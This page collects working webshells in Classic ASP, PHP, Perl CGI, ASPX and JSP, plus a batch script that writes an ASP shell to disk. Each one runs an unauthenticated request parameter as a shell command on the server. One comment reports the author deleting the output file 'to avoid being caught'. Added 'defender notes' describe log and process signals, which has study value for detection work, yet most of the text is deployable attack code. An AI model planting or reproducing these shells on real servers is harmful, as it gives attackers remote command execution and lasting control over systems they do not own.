Cmd Shell ASP/ASPX/JSP/PHP/CGI

Cmd Shell ASP版本执行命令:

<%

' Classic ASP (VBScript) page: takes the ".cmd" form field, runs it through
' cmd.exe via WScript.Shell, and captures the output in a temp file under C:\.
' Defender notes: the form on this page submits with POST, so the command is in
' the request body and will not normally show up in URL-only access logs. The
' observable artefacts are the web server's script host launching cmd.exe and a
' short-lived file with a generated name in the root of C:\.

Dim oScript

Dim oScriptnet

' NOTE(review): oScriptnet is declared but never used in this listing.

Dim oFileSys, oFile

Dim szCMD,szTempFile

szCMD=request.form(".cmd")

' Read the command string from the ".cmd" form field; it is used unvalidated below.

On Error Resume Next

' On any error, continue silently so that no error page is shown to the client.

set oScript=server.createobject("WSCRIPT.SHELL")

' Create the WScript.Shell (WshShell) COM object.

set oFileSys=server.createobject("scripting.filesystemobject")

szTempFile="C:\"& oFileSys.GetTempName()

' GetTempName() is a FileSystemObject method that generates a temporary file name
' (it does not create the file); the name is placed directly under C:\.

Call oScript.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)

' Call WshShell.Run to execute the command with stdout redirected into the temp
' file. Window style 0 hides the window; the final True waits for the command to end.

set oFile=oFileSys.OpenTextFile(szTempFile,1,False,0)

' Open the temp file for reading (1 = ForReading, False = do not create, 0 = ASCII).

%>

<HTML>

<body bgcolor="#C0C0C0" text="#000000">

<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=text name=".CMD" size=45 value="<%= szCMD %>">

<input type=submit value="好了" class=input>

</FORM>

<PRE>

<%

' Second script block of the page: print the captured command output, then clean up.
' oFile, oFileSys and szTempFile are set by the script block earlier on this page.

On Error Resume Next

response.write server.HTMLEncode(oFile.ReadAll)

' Write the HTML-encoded contents of the temp file into the response.

oFile.close

' Close the file.

call oFileSys.DeleteFile(szTempFile,True)

' Author's note: the file is deleted "to avoid being caught". The second argument
' (True) forces the deletion. Because the file is removed on every request it exists
' on disk only briefly, so file-creation telemetry rather than a later directory
' listing is what would record it.

%>

</body>

</html>



Cmd Shell PHP版本1

cmd.php

<?php

// Windows-only (uses PHP's COM class): instantiates Wscript.Shell and passes the
// `cmd` query-string parameter, unvalidated, to "cmd.exe /c". The command's stdout
// is echoed back without HTML encoding.
// Defender notes: the command travels in the URL (GET), so it is normally visible
// in web access logs; at process level the signal is the PHP host process
// launching cmd.exe.

$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");

// Exec() returns an object exposing the child's standard streams.
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['cmd']."");

$stdout = $exec->StdOut();

// ReadAll() reads the stream to its end before the output is echoed.
$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

用法:http://127.0.0.1/cmd.php?cmd=ver

 

Cmd Shell PHP版本2

<html>

<head>

<title>CMD命令行PHP版</title>

<body bgcolor="c0c0c6" text="ffffff">

<center><font size=3 face="黑体" color=red>CMD命令行PHP版</font><br><font size=2 color="000000">by heiyeluren</font><br><br>

<FORM METHOD=POST ACTION="<? echo $PHP_SELF ?>">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" value="执行"> <INPUT TYPE="reset" value="重写">

</FORM>

</center>

<hr>

<font size=2 color="000000">

<?php

// Runs the string in $cmd with the backtick (shell execution) operator and echoes
// the result. $cmd is never assigned in this listing; presumably it is populated
// from the POST field "cmd" by register_globals — TODO confirm.
// Defender notes: the form on this page submits with POST, so the command is in the
// request body; the output is echoed without HTML encoding; at process level the
// signal is the PHP host process spawning a shell.

if(empty($cmd)) { // check whether a command was entered

echo "没有输入任何命令!";

} elseif(!is_string($cmd)) { // check whether the variable is a string

echo "你输入的不是命令,请重新输入!";

} else {

echo `$cmd`; // execute the received variable (the command) and print its output

}

?>

</font>

</body>

</html>



Cmd Shell PHP版本3

<FORM ACTION="sys.php" METHOD=POST>

Command: <INPUT TYPE=TEXT NAME=cmd>

<INPUT TYPE=SUBMIT VALUE="Run">

<FORM>

<PRE>

<?php

   // If $cmd is set, pass it to system(), which runs it through the shell and writes
   // the command's output straight into the response (inside the surrounding <PRE>).
   // $cmd is never assigned in this listing; presumably it is populated from the POST
   // field "cmd" by register_globals — TODO confirm.
   // Defender notes: the form on this page posts to sys.php, so the command is in the
   // request body; the value is used unvalidated and the output is not HTML-encoded.

   if(isset($cmd)) {

       system($cmd);

   }

?>

<PRE>

 

Cmd Shell CGI版本1

# Perl CGI script (CGI.pm function interface): reads the "cmd" request parameter and
# runs it with backticks, with stderr merged into stdout by the "2>&1" suffix.
# Defender notes: the parameter is used unvalidated and the output is returned
# unencoded inside <pre>; at process level the signal is the web server's CGI
# handler spawning a shell.

use CGI qw(:standard);

# Emit the HTTP header, declaring the gb2312 charset.
print header(-charset=>gb2312);

$cmd=param("cmd");

# Backticks capture the command's combined stdout/stderr into $out.
$out=`$cmd 2>&1`;

# Render the form; the text field is pre-filled with the submitted command.
print start_form,textfield("cmd",$cmd,60);

print end_form;

print pre($out);



Cmd Shell CGI版本2

#!/usr/bin/perl

# Perl CGI script built on cgi-lib.pl: prints a GET form, parses the request into
# %in, and passes the "cmd" field to /bin/bash -c inside double quotes.
# Defender notes: the form uses METHOD=GET, so the command is part of the query
# string and is normally recorded in web access logs; the submitted value is also
# printed back into the page unencoded; at process level the signal is the web
# server's CGI handler spawning /bin/bash.

require "cgi-lib.pl";

print &PrintHeader;

print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n";

print "<INPUT NAME=cmd TYPE=TEXT>\n";

print "<INPUT TYPE=SUBMIT VALUE=Run>\n";

print "</FORM>\n";

# Parse the request parameters into the %in hash.
&ReadParse(*in);

# Only act when a non-empty "cmd" value was submitted.
if($in{'cmd'} ne "") {

   # Echo the raw command text, then the command's output, inside <PRE>.
   print "<PRE>\n$in{'cmd'}\n\n";

   print `/bin/bash -c "$in{'cmd'}"`;

   print "</PRE>\n";

}

 

Cmd Shell ASPX版本

<%@ Page Language="C#" Debug="true" Trace="false" %>

<%@ Import Namespace="System.Diagnostics" %>

<%@ Import Namespace="System.IO" %>

<script Language="c#" runat="server">

// Page load handler. Empty in this listing: the page does nothing on load, and the
// command execution is triggered from cmdExe_Click instead.
void Page_Load(object sender, EventArgs e)

{          

}

// Runs `arg` as "cmd.exe /c <arg>" and returns everything the child process wrote
// to standard output. (The spelling "Excute" is the author's; cmdExe_Click calls the
// method by this name.)
// - Only stdout is redirected; anything written to stderr is not part of the result.
// - There is no timeout and the Process object is not disposed.
// Defender notes: `arg` is concatenated into the command line unvalidated; at process
// level the signal is the ASP.NET host process launching cmd.exe.
string ExcuteCmd(string arg)

{

    ProcessStartInfo psi = new ProcessStartInfo();

    psi.FileName = "cmd.exe";

    psi.Arguments = "/c "+arg;

    // Redirecting stdout requires UseShellExecute to be false.
    psi.RedirectStandardOutput = true;

    psi.UseShellExecute = false;

    Process p = Process.Start(psi);

    StreamReader stmrdr = p.StandardOutput;

    // Blocks until the child closes its stdout.
    string s = stmrdr.ReadToEnd();

    stmrdr.Close();

    return s;

}

// Click handler for the page's button (wired through OnClick="cmdExe_Click" in the
// markup below). Passes the text box content to ExcuteCmd and writes the result,
// HTML-encoded, between <pre> tags in the response.
// Defender notes: the server form uses method="post", so the submitted text is in
// the request body rather than the URL.
void cmdExe_Click(object sender, System.EventArgs e)

{

    Response.Write("<pre>");

    // txtArg is the asp:TextBox declared in the page markup.
    Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));

    Response.Write("</pre>");

}

</script>

<HTML>

<HEAD>

   <title>awen asp.net webshell</title> 

</HEAD>

<body >

   <form id="cmd" method="post" runat="server">  

    <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>

    <asp:Button id="执行" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>

    <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">输入命令:</asp:Label>

   </form>

</body>

</HTML>

 

Cmd Shell JSP版本

<FORM METHOD=GET ACTION='cmdexec.jsp'>

<INPUT name='cmd' type=text>

<INPUT type=submit value='Run'>

</FORM>

<%@ page import="java.io.*" %>

<%

   // JSP scriptlet: reads the "cmd" request parameter and, when it is present, passes
   // it to Runtime.exec(String), collecting the child's stdout into `output`.
   // - exec(String) splits the string on whitespace and starts the program directly.
   // - Only stdout is read; lines are concatenated with no separator between them.
   // - Only IOException is caught; its stack trace goes to the server's error stream.
   // Defender notes: the form on this page uses METHOD=GET, so the parameter is
   // normally recorded in access logs; `output` is rendered further down the page
   // without HTML encoding; at process level the signal is the servlet container's
   // JVM spawning child processes.

   String cmd = request.getParameter("cmd");

   String output = "";

   if(cmd != null) {

      String s = null;

      try {

         Process p = Runtime.getRuntime().exec(cmd);

         // getInputStream() is the child's standard output.
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));

         while((s = sI.readLine()) != null) {

            output += s;

         }

      }

      catch(IOException e) {

         e.printStackTrace();

      }

   }

%>

<pre>

<%=output %>

</pre>

 

Cmd Shell Bat版本

rem Batch script that writes a Classic ASP page named cmdasp.asp into the current
rem directory, one echoed line at a time. The first echo creates or truncates the
rem file and the later ones append to it. Carets escape characters that the command
rem interpreter would otherwise treat as special.
rem The generated page mirrors the ASP listing at the top of this page: it reads the
rem .CMD form field, hands it to cmd.exe through WSCRIPT.SHELL, and prints the
rem captured output. It also creates a WSCRIPT.NETWORK object.
rem Defender notes: a run of echo commands redirected into a file with a server-side
rem script extension is a file-write pattern worth alerting on, as is a new .asp
rem file appearing in a directory served by the web server.
echo ^<^% > cmdasp.asp

echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp

echo On Error Resume Next >> cmdasp.asp

echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp

echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp

echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^")

     >> cmdasp.asp

echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp

echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp

echo szTempFile = ^"C:\^" & oFileSys.GetTempName() >> cmdasp.asp

echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True)

     >> cmdasp.asp

echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp

echo End If >> cmdasp.asp

echo ^%^> >> cmdasp.asp

echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"POST^"^>

     >> cmdasp.asp

echo ^<input type=text name=^".CMD^" size=70 value=^"^<^%= szCMD ^%^>^"^> >> cmdasp.asp

echo ^<input type=submit value=^"Run^"^> >> cmdasp.asp

echo ^</FORM^> >> cmdasp.asp

echo ^<PRE^> >> cmdasp.asp

echo ^<^% >> cmdasp.asp

echo If (IsObject(oFile)) Then >> cmdasp.asp

echo On Error Resume Next >> cmdasp.asp

echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp

echo oFile.Close >> cmdasp.asp

echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp

echo End If >> cmdasp.asp

echo ^%^> >> cmdasp.asp

echo ^<^/PRE^> >> cmdasp.asp

